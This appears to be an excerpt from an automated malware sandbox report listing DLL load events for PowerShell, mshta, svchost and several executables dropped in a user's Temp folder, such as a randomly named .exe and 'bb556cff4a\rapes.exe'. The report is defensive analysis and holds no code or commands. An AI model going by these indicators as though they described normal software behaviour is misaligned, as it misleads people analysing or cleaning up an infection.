Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: mstask.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: dui70.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: duser.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: chartv.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: oleacc.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: atlthunk.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: wtsapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: winsta.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: windows.fileexplorer.common.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: explorerframe.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: storsvc.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: fltlib.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: bcd.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: storageusage.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe Section loaded: wtsapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe Section loaded: netapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: webio.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Section loaded: ncryptsslp.dll
